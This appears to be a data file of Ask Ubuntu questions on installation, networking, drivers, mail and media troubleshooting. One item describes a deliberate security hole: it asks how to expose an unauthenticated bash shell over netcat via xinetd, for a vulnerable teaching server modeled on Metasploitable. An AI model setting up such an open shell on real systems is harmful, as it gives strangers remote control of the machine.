266627	ca n't install ubuntu on lenovo z585	i ca n't install ubuntu ( 12.10 and 12.04 ) ( also tried mint ) on z585 ( lenovo ideapad z585 amd a8-4500m 1.90ghz 8gb 1tb dvdrw dl freedos 15.6 '' hd amd radeon hd7670 2gb ) . i tested all possible options and still no luck so this is my call for the help.. hope that someone knows something that is not yet listed : ) edit the steps i made : disable uefi ( also tried with enabled ) attempt to install ubuntu from dvd select `` install ubuntu '' change options : acpi=off ; nomodeset ( tried all combinations ) press enter . result : shown a black screen with blinking cursor- no errors no nothing , i ca n't enter anything and i can only turn off the laptop via shut button ( by holding it ) so i never got trough installation ( same thing i get if i do `` try '' instead of `` install '' ) . note that i had no trouble installing windows 7. p.s . i also tried the following : my computer boots to a black screen , what options do i have to fix it ? booting ubuntu 12.04 with `` acpi=off '' grub parameter http : //ubuntuforums.org/showthread.php ? t=2077126 & page=3 how to set nomodeset for installation ? btw i get stuck every time on black screen with blinking cursor only . thanks
266628	qt5 qtcreator using a c++function in main.qml to create a file /tmp/	i want to write an app for ubuntu touch based on the qtquick2applicationviewer template and the app needs to write to a file ( e.g . '/tmp/test.log ' ) . i tested with using a function/macro q_invokable : q_invokable void qtquick2applicationviewer : :setdata3 ( void ) { qdebug ( ) < < `` setdata '' ; } ... and share it by q_invokable . but i can not call the function in my .qml , and i got an error : ... main.qml:289 : referenceerror : setdata3 `` is not defined '' has anyone got a working demo.pro file to download ? or a working method to create a file using a cpp-function+qml as .pro to download ? working in the qtcreator-version for ubuntutouch ?
266629	does maas have any log ?	using following articles , testing maas ubuntu cloud infrastructure with maas and juju i tried to setup ubuntu server 12.04 's private cloud in a virtual environment provided by kvm and virt-install . i resolved several issues but now , this one is fooling me for several days : ( unexpected error interacting with provider : 409 conflict i get this answer in result of juju bootstrap i know that this means that the maas can not allocate the needed nodes to bootstrap juju ; but i checked all configurations several times . i also did not get any error while above articles processings ! i 've been added needed nodes and accepted them and now they 're in commissioning state . my non-admin username in maas matches who runs juju and it 's ssh key also matches . i doubted the maas-dhcp server , so i even added a live-cd virtual machine and i saw in maas 's syslog that it successfully can assign a new ip to the new virtual machine . i really do not know what problem can be : ( anyway , does maas log anything about why it can not allocate needed nodes ? ! if so , where is it ? thanks in advance !
266631	maximized windows go under vertical taskbar with dual monitors on kde	i just installed kde and put the taskbar vertically on one of my 2 monitors . the problem is that maximized windows do n't recognize the taskbar space . the maximized windows go under the taskbar . it works fine if i use only one monitor or set the 2nd monitor as a clone . it then works as expected , that is when i maximize a window it goes up to the edge of the taskbar . how can i make it work like this using dual monitors ?
266632	java internet explorer 7 update	unfortunately i have to use internet explorer ( 7 ) through wine in ubuntu 12.04 . the other browsers do n't work with this website . but some java updates are required to open some pop up windows . there is a way to update java . tks and cheers
266637	problem installing ubuntu- hangs at preparation	i have read that this problem usually is in result of my partition not being clean ? i believe i have a failed installation that may be causing trouble but not sure . here is what my partitions look like as of now . setting aside the 40gb partition for ubuntu . if you could suggest a few steps i would appreciate it ! thanks .
266640	why ca n't i browse windows shares although i can connect to them ?	in nautilus i can connect to windows shares using 'connect to ' , but i ca n't browse to them in the network area . they do n't show up . my linux samba shares show up , but not the windows machines . what 's the reason and how can i fix that ?
266642	diskless with ubuntu 12.04	i 'm trying to setup a new diskless solution with ubuntu 12.04 without any success . i followed this howto : https : //help.ubuntu.com/community/disklessubuntuhowto but the initramfs seems not to be able to mount my nfs share . on my server side : my /etc/exports /srv/nfs4 192.168.0.0/24 ( fsid=0 , rw , no_subtree_check ) /srv/nfs4/nfsroot 192.168.0.0/24 ( rw , no_root_squash , no_subtree_check , fsid=1 , nohide , insecure , sync ) i 'm able to mount my nfs share on standard ubuntu installation without any problem . i can mount my nfs on any client with those commands : mount 192.168.0.3 : /nfsroot /mnt or mount 192.168.0.3 : /srv/nfs4/nfsroot /mnt my /tftpboot/pxelinux.cfg/default config file is default vmlinuz-3.5.0-25-generic root=/dev/nfs initrd=initrd.img-3.5.0-25-generic nfsroot=192.168.0.3 : /nfsroot ip=dhcp rw i also tried default vmlinuz-3.5.0-25-generic root=/dev/nfs initrd=initrd.img-3.5.0-25-generic nfsroot=192.168.0.3 : /srv/nfs4/nfsroot ip=dhcp rw . what i got in initramfs : with the setting [ nfsroot=192.168.0.3 : /nfsroot ] diskless output : mount call failed - server replied : permission denied on syslog of my nfs server : rpc.mountd [ 1266 ] : refused mount request from 192.168.0.10 for /nfsroot ( / ) : not exported with the setting [ nfsroot=192.168.0.3 : /srv/nfs4/nfsroot ] diskless output : mount : the kernel lacks nfs v3 support on syslog of my nfs server i got : mar 11 14:03:06 bootfromlan rpc.mountd [ 1266 ] : authenticated mount request from 192.168.0.10:834 for /srv/nfs4/nfsroot ( /srv/nfs4/nfsroot ) mar 11 14:03:06 bootfromlan rpc.mountd [ 1266 ] : refused unmount request from 192.168.0.10 for /root ( / ) : not exported
266646	macbook install no wifi - how to install without a working nic ?	fist up i apologise if this has been asked . a quick search did not seem to answer my query , so it 's off to crowd support land with this question : i have installed ubuntu 12.04 using a usb install on a macbook pro ( 5,5 ) , and do n't have a hard wired internet connection . i do however have a way of getting files onto the macbook via usb ( ie i can download files on another device that does have wifi , and transfer to the ubuntu machine i am setting up ) what is the simplest way to get the wifi card working so i can complete my setup over the wifi . lspci | grep network reports the card is : broadcom bcm4322 802.11a/b/g/n i do n't mind having to manually run scripts etc , and it appears to have a working gcc so if need be i can build from source , and then update the driver later . this how to fix a broadcom 43224 ( rev . 01 ) in ubuntu 12.10 , running on a macbook pro 6,2 ? offers a solution that involves having a way of getting online already . ideally i 'd just like to download a tar.gz or something and install a driver .
266648	usb 3.0/ uasp - how to find out that mass storage uses uasp ?	my question is how can i find out if a usb 3.0 connected mass storage device is using uasp ( usb attached scsi protocol ) ?
266654	wireless not working on dell xps m1530	i have just installed ubuntu on my dell xps m1530 . the installation worked fine , but i ca n't find any available routers . i have made sure that the wifi switch on the side of the computer is on , i have tried to restart the computer and i have also enabled the networking . since i ca n't find any way to format the computer to how it was before i installed it ( used an usb-drive ) i can not do anything about it .
266655	howto prevent gedit always opening a new unnamed file when launched	is there a way to prevent gedit from always opening a new `` untitled '' file when launched ( at least when an other file name is passed either with alt+f2 and gksudo ) ? it is borring to always have to click `` do n't save '' for this null file with nothing typed in it . thank you
266658	how can i run an autorun file as root with no gui	i set up a server using ubuntu with no gui . i need root for some tasks that i want to autorun on this server . normally i would just use gksudo because autorun programs never seem to work with su or sudo . gksudo will not run because there is no gui on this server . i decided to install xubuntu-desktop on it but this slows it significantly . what is a way that i can run an autorun file as root without any need for a gui ? by autorun i mean i want to create a sh script that will startup on login . i want it to have root privelages and sh scripts dont work with sudo because they run all the code as the sudo password .
266660	should i be worried about a possible threat ?	i recently installed ubuntu 12.10 . i use clamav and have scanned my system regularly for infections . today it picked up a potential threat /usr/lib/ruby/1.9.1/rdoc/generator/template/darkfish/js/thickbox-compressed.js . ubuntu is my only operating system installed . clamav was not able to delete or quarantine the file . should i be concerned or is this a false positive ? i have scanned the same file multiple times and it picks it up as a threat each time . also i tried googling the issue before posting and found no information . a point i forgot to mention , clamav picks it up as pua.script.packed-1
266662	why does n't ubuntu automatically disable wireless networking when a wired connection is active ?	when i have wireless enabled and plug in my ethernet cable , the wireless connection stays active , even when the wireless and wired connections are through the same network . i 'm aware of this question that tells how to disable it , but i want to know why this is n't ubuntu 's default behavior or why ubuntu does not have an option in its settings to allow for this . the only reason i can imagine to keep the wireless connection active is to be able to reach other lan devices on that network , but that argument does n't hold when the wireless and wired connections are with the same network . another reason may be so that you do n't lose precious seconds when unplugging your ethernet , but i doubt this is a valid argument because removing ethernet mostly means you are moving to another place and most people do n't use their pc when moving .
266663	ffmpeg resize `` could not find codec parameters ''	i 'm a newbee to ubuntu and need your help : ( 32bit ubuntu 12.10 ) my command : ffmpeg -i ../output_images/particles % 04d.png -r 30 -b 30000k final_movie.avi works for my 800x800 *.png pictures properly , but it does n't with 512x512 *.png . there i get the following message : [ image2 @ 0x938a100 ] could not find codec parameters ( video : png , 512x512 ) on the campus-machines it works for both with the same code . i tried doing a resize-command : for p in *.tga ; do convert -resize 800x800 $ p $ p ; done with this added , it works , but i have and 800x800-movie in the end . i 've already installed the following packages : glut : sudo apt-get install freeglut3-dev ffmpeg : sudo apt-get install ffmpeg there was a `` curl command not found '' error . i fixed it with : sudo apt-get install curl there was another `` convert : command not found '' and i fixed it with : sudo apt-get install imagemagick any idea what is missing ?
266668	automount encrypted home partition on boot	after update around 1 month ago my laptop did not mount encrypted home partition on login/boot ( not sure when this happened before ) - which results to unable to login . now i have to manually switch to tty1 and ecryptfs-mount-private it by myself . how to automate this part ? what is wrong ?
266671	can not connect to ethernet with wired connection ubuntu 12.10	i am new to ubuntu ( installed ubuntu 12.10 desktop on my mac mini today from ubuntu iso â mac mini had blank ssd on it i.e . no os x at all ) . first drama is that ubuntu installer seems to be setup for dhcp whereas my lan is all static ip based . anyway , ubuntu installed okay except that it seems to have gone into loopback mode and can not find the ethernet adapter on the mac mini . doing an ifconfig -a confirms the loopback . doing an lspci reveals the following : 01:00.0 ethernet controller : broadcom corporation netxtreme bcm57766 gigabit ethernet pcie ( rev 05 ) i tried setting /etc/hosts file to include : 127.0.0.1 localhost 192.168.0.2 merlot i wanted to set /etc/network/interfaces file to have : auto eth0 iface eth0 inet static address 192.168.0.2 netmask 255.255.255.0 gateway 192.168.0.1 except that eth0 does n't seem to exist as far as ubuntu is concerned . 192.168.0.1 is my modem/router which connects directly to the internet . i wanted to edit /etc/resolv.conf so that i could specify some dns name servers ( 3 in total ) that should be used except that the resolv.conf file contained text warning me that the file would be overwritten so do n't bother doing anything manually in that file . checking 'system settings > network ' i can not see wired ethernet at all . there is , for some reason , a 'network proxy ' defined . a messagebox appears saying : the system network services are not compatible with this version . when i am able to modify via 'system settings > network ' the only option permitted to me is to add a 'vpn ' definition . i have not been able to establish a network connection at all . what can i try to fix this ? do i need a driver from somewhere and can i install said driver without having to recompile the kernel ? is there a gui way of setting network parameters or is editing the hosts , resolv.conf , and interfaces file the only way ? how can i find the ethernet mac address from terminal ( i could n't get it by doing ifconfig -a ) ?
266676	filesystem is `` read only '' even though `mount` lists it as `` rw ''	i 'm not sure what happened , but right now all filesystems ( expecpt for / which is on a separate drive ) are `` read only '' even though mount lists them as `` rw '' : $ mount /dev/sda1 on /media/data type ext4 ( rw , nosuid , nodev , user_xattr ) but wehn trying to create a file , i get : $ cd /media/data/ ; touch hello touch : can not touch `hello ' : read-only file system trying to remount as rw leads to an error : $ sudo mount -o remount , rw -t ext4 /dev/sda1 /media/data mount : can not remount block device /dev/sda1 read-write , is write-protected any suggestions ? could this be a physical problem of the drive ?
266680	login screen loop	i have ubuntu 12.04 64bits and it worked fine until today . this is the problem : when i introduce my password at the login screen a black window appears and then it comes back to the same screen . if i start as a guest everything works fine , but i ca n't log in with my normal account . i tried the following with no luck : installing gdm and/or reinstalling lightdm trying to remove the .xauthority file changing .xauthority i can login through a virtual terminal ( ctrl+alt+f1 ) without a problem . thanks in advance .
266682	rosewill wireless pci card not working	relevant specs rosewill rnx-n250pc2 pci wireless adapter biostar a780l3c motherboard ubuntu 12.10 on first install on 12.10 , wireless card worked perfect out of the box . however , after updating system software , it no longer works . the settings are all still there in the network manager , but ca n't seem to get it to function . output of lspci -nn | grep 0280 gives : network controller [ 0280 ] : atheros communications inc. ar9227 wireless network adapter [ 168c:002d ] ( rev 01 ) output of lshw -c network gives the following *-network unclaimed description : network controller product : ar9227 wireless network adapter vendor : atheros communications inc. physical id : 5 bus info : pci @ 0000:03:05.0 version : 01 width : 32 bits clock : 66mhz capabilities : bus_master cap_list configuration : latency=64 resources : memory : febf0000-febfffff
266685	printer always prints one more page . how can i stop it ?	i have set up my lexmark e120 printer successfully . however whenever i print ( not always only 80 % of the times ) i get one more redundant page with the following text : l set density=5 @ pjl set ret=off @ pjl set economode=on @ pjl set duplex=off ... this is really annoying . how can i stop it ? using ubuntu latest .
266688	create bash with xinetd	i 'm making an intentionally vulnerable ubuntu server for an information security class . i 'm trying to create a bash shell that is accessible without authentication , a user should just be able to connect with netcat and get a full shell . this is done in the metasploitable2 vm on port 1524 . does anyone know the best way to set this up ? i know that metasploitable is using the xinetd service , but i ca n't find the necessary configuration in the xinetd.conf or the xinetd.d/ directory . i 'm running ubuntu 10.04 .
266689	how to convert my video into a file which can be viewed in movie player with ffdiaporama ?	downloaded ffd diaporama video editting software and can not convert my video into a file which can be viewed in movie player ! i tried saving with .avi , etc. , and it just adds the .ffd at the end .
266690	how to play minecraft with a ps3 sixaxis controller on ubuntu ?	i originally posted this on another stackexchange site , arqade , but i 've had no luck there , so i 've deleted it there in order to ask it somewhere with more ubuntu specific knowledge . here 's the what i originally wrote on arqade : i would really love to be able to play minecraft on my ubuntu laptop with my sixaxis . while i 've experimented with sixad i did n't really know what i was doing and i could n't get minecraft to recognise the sixaxis buttons as inputs . can anyone give me a step-by-step guide to getting it to work ? basically , i got my ps3 controller connected to my laptop by bluetooth and i was able to control the computer with it ; move mouse , scroll , move mouse with gyroscope etc. , but i could n't get minecraft to recognise the ps3 controller 's outputs as inputs . so yeah , can anyone give me a step-by-step guide ? i 'm running ubuntu 12.10 on a hp folio 13 . thanks in advance . edit : tried again today . it 's become worse . i can connect the sixaxis to the computer with sixpair and sixad etc . but now the computer is not recognising any inputs . i ca n't move the mouse with the joystick any more , for example . please help !
266691	where can i download mingw32 version 4.72 for ubuntu ?	i am cross compiling some software for linux that needs the 4.72 version of the mingw32 compiler to work . however , the version in the repos is only 4.4 , where can i find 4.72 ?
266694	how to prevent battery charging unless dips below 95 % ? on an asus u31sd-xh51	i have an asus u31sd-xh51 laptop running latest ubuntu 12.04 lts and i want to know if there is a way to prevent the system from charging the battery unless its charged level dips below 95 % ? this is a feature i notice from my windows 7 partition . according to asus , while the charge level is at least 95 % , the system would not charge in order to prevent deterioration . however , this is not the case on ubuntu 12.04 because the system would still charge my battery even at 99 % . anyone shred some light for me ?
266695	is it possible to log into home directory via the internet	i 've got a home fileserver running ubuntu 12.04 server edition . i am curious if there is a web interface available that will allow users to log into their home directories to view or even download their files . the basic concept that i had in mind was to create a photo gallery that was viewable via the web , but i would like to prevent the entire world from viewing those photos . i am capable of developing the web interface , i am just unsure if it is possible for apache to log into local user accounts .
266696	how do i install windows on a computer with grub ?	i previously installed ubuntu and i wanted to install windows vista via the repair disc included with the laptop . booted up the computer with the disc in , nothing . i already set the boot order , so that is not the issue . i booted from an ubuntu live cd and just deleted all the partitions via gparted , but still no dice . so now i basically have a computer with no operating system that can not boot from the windows vista recovery disc , but i can boot from an ubuntu livecd . grub seems to still be installed , and for some reason blocks me from booting from a recovery disc . i would appreciate any help .
266699	touchpad not working toshiba a660-167 ( ubuntu 64bit )	i have a toshiba satellite a660-167 i just installed ubuntu 12.04 ( 64bit ) but the touchpad is not working . it works in windows 7 ( i have a dual boot ) but not in ubuntu . i use a usb mouse and it works fine but not the touchpad . are there any extra drivers for my touchpad ? ? any idea how to make it work ? ? ? can anyone help ? ? ? ? ?
266701	how do i forward a email to gmail using virtual_mailbox_maps with postfix and dovecot ?	i have a maio server set up with postfix a dovecot and i user virtual_mailbox_maps to handle multiple domain email addresses . i want to be able to forward some of these emails to a gmail account . my virtual_mailbox_maps in postfix points to /etc/postfix/vmaps and looks like this info @ domain1.com domain1.com/info/ info @ domain2.com domain2.com/info/ i have tried adding info @ domain3.com email @ gmail.com but it doesnt work . any suggestions ? thanks
266703	google earth installation fail ubuntu 12.10	i have tried many things trying to install google earth , but none have worked . here is one that i have tried , along with the 32 and the 64 bit versions on googles website . here is what i put into the terminal . : peter @ ubuntu : ~ $ sudo apt-get install lsb-core [ sudo ] password for peter : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : lsb-core : depends : alien ( > = 8.36 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . peter @ ubuntu : ~ $ sudo apt-get install lsb-core reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : lsb-core : depends : alien ( > = 8.36 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . peter @ ubuntu : ~ $ make-googleearth-package the program 'make-googleearth-package ' is currently not installed . you can install it by typing : sudo apt-get install googleearth-package peter @ ubuntu : ~ $ make-googleearth-package -- force make-googleearth-package -- force : command not found peter @ ubuntu : ~ $ sudo apt-get remove google-earth-stable reading package lists ... done building dependency tree reading state information ... done e : unable to locate package google-earth-stable peter @ ubuntu : ~ $ wget -q -o - https : //dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add gpg : ca n't open ` ' : no such file or directory peter @ ubuntu : ~ $ peter @ ubuntu : ~ $ sudo sh -c 'echo `` deb http : //dl.google.com/linux/earth/deb/ stable main '' > > /etc/apt/sources.list.d/google.list' peter @ ubuntu : ~ $ peter @ ubuntu : ~ $ sudo apt-get update ign http : //security.ubuntu.com precise-security inrelease ign http : //archive.ubuntu.com precise inrelease hit http : //security.ubuntu.com precise-security release.gpg ign http : //archive.canonical.com quantal inrelease get:1 http : //repository.spotify.com stable inrelease [ 2,979 b ] ign http : //archive.ubuntu.com precise-updates inrelease ign http : //ppa.launchpad.net quantal inrelease hit http : //security.ubuntu.com precise-security release hit http : //archive.canonical.com quantal release.gpg ign http : //archive.ubuntu.com precise-proposed inrelease hit http : //ppa.launchpad.net quantal release.gpg hit http : //security.ubuntu.com precise-security/main sources hit http : //repository.spotify.com stable/non-free sources hit http : //archive.canonical.com quantal release ign http : //archive.ubuntu.com precise-backports inrelease hit http : //ppa.launchpad.net quantal release hit http : //security.ubuntu.com precise-security/restricted sources hit http : //repository.spotify.com stable/non-free amd64 packages hit http : //archive.canonical.com quantal/partner amd64 packages hit http : //archive.ubuntu.com precise release.gpg hit http : //ppa.launchpad.net quantal/main sources hit http : //security.ubuntu.com precise-security/universe sources get:2 http : //archive.ubuntu.com precise-updates release.gpg [ 198 b ] hit http : //ppa.launchpad.net quantal/main amd64 packages hit http : //security.ubuntu.com precise-security/multiverse sources get:3 http : //archive.ubuntu.com precise-proposed release.gpg [ 198 b ] hit http : //security.ubuntu.com precise-security/main amd64 packages hit http : //archive.ubuntu.com precise-backports release.gpg hit http : //security.ubuntu.com precise-security/restricted amd64 packages hit http : //archive.ubuntu.com precise release hit http : //security.ubuntu.com precise-security/universe amd64 packages ign https : //private-ppa.launchpad.net quantal inrelease get:4 http : //archive.ubuntu.com precise-updates release [ 49.6 kb ] hit http : //security.ubuntu.com precise-security/multiverse amd64 packages hit http : //security.ubuntu.com precise-security/main translation-en get:5 http : //archive.ubuntu.com precise-proposed release [ 49.6 kb ] hit http : //security.ubuntu.com precise-security/multiverse translation-en hit https : //private-ppa.launchpad.net quantal release.gpg ign http : //repository.spotify.com stable/non-free translation-en_us ign http : //archive.canonical.com quantal/partner translation-en_us hit http : //archive.ubuntu.com precise-backports release hit https : //private-ppa.launchpad.net quantal release ign http : //ppa.launchpad.net quantal/main translation-en_us ign http : //archive.canonical.com quantal/partner translation-en ign http : //repository.spotify.com stable/non-free translation-en hit http : //archive.ubuntu.com precise/main sources ign http : //ppa.launchpad.net quantal/main translation-en hit https : //private-ppa.launchpad.net quantal/main amd64 packages hit http : //archive.ubuntu.com precise/restricted sources hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //archive.ubuntu.com precise/universe sources hit http : //archive.ubuntu.com precise/multiverse sources hit http : //security.ubuntu.com precise-security/universe translation-en hit http : //archive.ubuntu.com precise/main amd64 packages hit http : //archive.ubuntu.com precise/restricted amd64 packages hit http : //archive.ubuntu.com precise/universe amd64 packages hit http : //archive.ubuntu.com precise/multiverse amd64 packages hit http : //archive.ubuntu.com precise/main translation-en hit http : //archive.ubuntu.com precise/multiverse translation-en hit http : //archive.ubuntu.com precise/restricted translation-en ign http : //security.ubuntu.com precise-security/main translation-en_us hit http : //archive.ubuntu.com precise/universe translation-en ign http : //security.ubuntu.com precise-security/multiverse translation-en_us get:6 http : //archive.ubuntu.com precise-updates/main sources [ 370 kb ] ign http : //security.ubuntu.com precise-security/restricted translation-en_us ign http : //security.ubuntu.com precise-security/universe translation-en_us ign http : //dl.google.com stable inrelease ign http : //dl.google.com stable inrelease hit http : //dl.google.com stable release.gpg get:7 http : //dl.google.com stable release.gpg [ 198 b ] hit http : //dl.google.com stable release get:8 http : //dl.google.com stable release [ 1,338 b ] hit http : //dl.google.com stable/main amd64 packages get:9 http : //dl.google.com stable/main amd64 packages [ 469 b ] get:10 http : //archive.ubuntu.com precise-updates/restricted sources [ 5,120 b ] get:11 http : //archive.ubuntu.com precise-updates/universe sources [ 80.2 kb ] ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en get:12 http : //archive.ubuntu.com precise-updates/multiverse sources [ 4,729 b ] get:13 http : //archive.ubuntu.com precise-updates/main amd64 packages [ 585 kb ] ign https : //private-ppa.launchpad.net quantal/main translation-en_us ign https : //private-ppa.launchpad.net quantal/main translation-en get:14 http : //archive.ubuntu.com precise-updates/restricted amd64 packages [ 9,579 b ] get:15 http : //archive.ubuntu.com precise-updates/universe amd64 packages [ 185 kb ] get:16 http : //archive.ubuntu.com precise-updates/multiverse amd64 packages [ 9,436 b ] get:17 http : //archive.ubuntu.com precise-updates/main translation-en [ 261 kb ] hit http : //archive.ubuntu.com precise-updates/multiverse translation-en hit http : //archive.ubuntu.com precise-updates/restricted translation-en get:18 http : //archive.ubuntu.com precise-updates/universe translation-en [ 109 kb ] get:19 http : //archive.ubuntu.com precise-proposed/restricted amd64 packages [ 2,093 b ] get:20 http : //archive.ubuntu.com precise-proposed/main amd64 packages [ 47.6 kb ] get:21 http : //archive.ubuntu.com precise-proposed/multiverse amd64 packages [ 1,442 b ] get:22 http : //archive.ubuntu.com precise-proposed/universe amd64 packages [ 16.8 kb ] get:23 http : //archive.ubuntu.com precise-proposed/main translation-en [ 26.9 kb ] hit http : //archive.ubuntu.com precise-proposed/multiverse translation-en hit http : //archive.ubuntu.com precise-proposed/restricted translation-en get:24 http : //archive.ubuntu.com precise-proposed/universe translation-en [ 10.1 kb ] hit http : //archive.ubuntu.com precise-backports/restricted amd64 packages hit http : //archive.ubuntu.com precise-backports/main amd64 packages hit http : //archive.ubuntu.com precise-backports/multiverse amd64 packages hit http : //archive.ubuntu.com precise-backports/universe amd64 packages hit http : //archive.ubuntu.com precise-backports/main translation-en hit http : //archive.ubuntu.com precise-backports/multiverse translation-en hit http : //archive.ubuntu.com precise-backports/restricted translation-en hit http : //archive.ubuntu.com precise-backports/universe translation-en ign http : //archive.ubuntu.com precise/main translation-en_us ign http : //archive.ubuntu.com precise/multiverse translation-en_us ign http : //archive.ubuntu.com precise/restricted translation-en_us ign http : //archive.ubuntu.com precise/universe translation-en_us ign http : //archive.ubuntu.com precise-updates/main translation-en_us ign http : //archive.ubuntu.com precise-updates/multiverse translation-en_us ign http : //archive.ubuntu.com precise-updates/restricted translation-en_us ign http : //archive.ubuntu.com precise-updates/universe translation-en_us ign http : //archive.ubuntu.com precise-proposed/main translation-en_us ign http : //archive.ubuntu.com precise-proposed/multiverse translation-en_us ign http : //archive.ubuntu.com precise-proposed/restricted translation-en_us ign http : //archive.ubuntu.com precise-proposed/universe translation-en_us ign http : //archive.ubuntu.com precise-backports/main translation-en_us ign http : //archive.ubuntu.com precise-backports/multiverse translation-en_us ign http : //archive.ubuntu.com precise-backports/restricted translation-en_us ign http : //archive.ubuntu.com precise-backports/universe translation-en_us fetched 1,828 kb in 27s ( 66.3 kb/s ) reading package lists ... done peter @ ubuntu : ~ $ peter @ ubuntu : ~ $ sudo apt-get install google-earth-stable reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : google-earth-stable : depends : lsb-core ( > = 3.2 ) but it is not going to be installed depends : ia32-libs but it is not going to be installed e : unable to correct problems , you have held broken packages . peter @ ubuntu : ~ $
266704	it is possible to install openoffice.org on later versions of ubuntu ?	i want to replace libreoffice with openoffice.org o ubuntu 12.10 with gnome classic.but i want to install the italian version because i 'm italian .
266706	how to login in terminal using ctrl+alt+ f1-f6 ?	i am using ubuntu 12.10 and sometimes the windows environment crashes . but , i am still able to move the mouse and call the tty windows using ctrl+alt+f1-6 keys . but i am never able to login sucessfully . i can call the terminal icon in the windows and make a root login . but when the terminal is called with ctrl+alt+fx keys it always gives invalid login . how to make a login this way and how to reset the windows environment ( to cancel the crash ) ? thank you
266709	24 '' widescreen monitor - stretched interface	i have my monitor set on the highest setting in ubuntu but the interface , etc . is stretched horizontally . my monitor 's recommended setting is 1920x1080 ( dell p2412h ) on the pc side . how can i change ubuntu to display the correct dimensions ? thanks for your help .
266711	is creative commons a recoginsed license ?	i would like to package an application that uses creative commons attribution-sharealike 3.0 : http : //www.gmaptool.eu/en/content/license http : //creativecommons.org/licenses/by-sa/3.0/legalcode is this a recognized open source license ? so can i package the code ? thanks and kind regards ,
266712	upgraded from 10.04 to 12.04 , lost internet connectivity	since i upgraded my hp proliant server from ubuntu 10.04 to 12.04 , i am unable to : ping google.com ping 8.8.8.8 browse the internet with firefox git fetch origin cap deploy from a remote machine i can however see my rails application running on this server when i access it via its ip address within our corporate network . i see the networking icon in the gui but `` wired network '' is greyed out . here is some other relevant info , based on the numerous similar but non-resolving threads i 've browsed here at au : dean @ dgwjasonfried : ~ $ ifconfig eth0 link encap : ethernet hwaddr 1c : c1 : de : fa : cd:9f inet addr:10.24.5.50 bcast:10.24.5.255 mask:255.255.255.0 inet6 addr : fe80 : :1ec1 : deff : fefa : cd9f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:40735 errors:0 dropped:0 overruns:0 frame:0 tx packets:77215 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2806140 ( 2.8 mb ) tx bytes:113945803 ( 113.9 mb ) interrupt:19 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:22 errors:0 dropped:0 overruns:0 frame:0 tx packets:22 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1872 ( 1.8 kb ) tx bytes:1872 ( 1.8 kb ) dean @ dgwjasonfried : ~ $ lspci -nn | grep ethernet 1e:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme bcm5723 gigabit ethernet pcie [ 14e4:165b ] ( rev 10 ) /etc/network/interfaces : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet dhcp /etc/resolv.conf : domain dgw.ame.molex.com search dgw.ame.molex.com nameserver 10.24.2.171 nameserver 10.45.2.171 **updated 3/19/13 , after trying to follow some of the advice give in responses below and elsewhere : dean @ dgwjasonfried : ~ $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 search dgw.ame.molex.com domain dgw.ame.molex.com search dgw.ame.molex.com nameserver 10.24.2.171 nameserver 10.45.2.171 **end of update kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.24.5.1 0.0.0.0 ug 0 0 0 eth0 10.24.5.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 **updated to show networkmanager.conf and evidence that the resolv.conf symlink is working for me dean @ dgwjasonfried : ~ $ cat /etc/networkmanager/networkmanager.conf [ main ] plugins=ifupdown , keyfile dns=dnsmasq [ ifupdown ] managed=true dean @ dgwjasonfried : ~ $ ls -l /etc/resolv.conf lrwxrwxrwx 1 root root 29 mar 18 09:33 /etc/resolv.conf - > ../run/resolvconf/resolv.conf **updated to show latest resolv.conf after i deleted original in /etc/resolvconf/resolv.conf.d and cleared out the copy of original that was sitting in tail , then rebooted : dean @ dgwjasonfried : /etc/resolvconf/resolv.conf.d $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 search dgw.ame.molex.com note that the nameserver entries listed in an earlier resolv.conf version above are now gone . also note that whereas i was briefly able to get ping google.com to resolve the ip address for google.com ( but still not receive any packets back ) i 'm now back to my original situation where i get 'unknown host google.com ' . **end of update i 'd be grateful for any help you could supply or suggestions you might have . thanks ! dean richardson
266714	how do i replace ubuntu with ubuntu studio on a dual boot system ( windows 8-32 bit and ubuntu 12.04	how do i replace ubuntu with ubuntu studio on a dual boot system ( windows 8-32 bit and ubuntu 11.04 . i 'm not a linux geek so i need some concise but simple instructions . i upgraded to windows 8 from vista . this is not a 64 bit computer .
